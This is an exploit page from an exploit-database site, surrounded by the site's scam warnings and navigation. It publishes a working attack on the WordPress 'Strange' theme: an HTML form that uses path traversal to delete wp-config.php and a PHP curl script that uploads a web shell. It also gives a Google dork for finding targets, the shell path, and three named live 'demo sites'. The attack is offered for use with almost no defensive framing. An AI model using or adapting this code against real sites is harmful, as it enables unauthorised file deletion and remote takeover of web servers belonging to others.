0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Theme Strange File Upload / File Deletion
Exploit Title : Wordpress Theme Strange File Upload / File Deletion Exploit Author : NULL_Pointer Contact : https://www.facebook.com/xenith.gianni Date : 21/09/2014 Github Mirror : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/ut-strange Version : 3.1 Google Dork : inurl:/wp-content/themes/ut-strange/ Tested on : Linux, Windows 7 -------------------------------------------------------------- Wordpress Theme Strange have suffers from a File Upload and File Deletion Vulnerability. 1. File Deletion : This issue allows an attacker to influence calls to the 'unlink()' function and delete arbitrary files. Due to a lack of input validation, an attacker can supply directory traversal sequences followed by an arbitrary file name to delete specific files. Exploit Code (HTML) : <form action="http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" method="POST"> <input type="hidden" name="action" value="deletefile"> <input type="text" name="file" value="../../../wp-config.php"> <input type="submit" value="Delete It"> </form> 2. File Upload : Exploit Code (PHP) : <?php if (!isset ($argv[1], $argv[2])) die ("Usage : php {$argv[0]} http://127.0.0.1/ my_shell.php"); if (!file_exists ($argv[2])) die ("Fatal Error : File \"{$argv[2]}\" Not Found...\n"); $post = array ( "file_upload" => "@".$argv[2], "themeroot" => "." //,"dir"=>"." ); $ch = curl_init ($argv[1]."/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); echo $data; ?> Shell Path : http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/[SHELL_NAME] Demo Sites : http://www.estudio34.com http://www.argela.com http://www.gcntv.net Proof Video : http://www.youtube.com/watch?v=eVHITnvYjqs # 0day.today [2024-12-23] #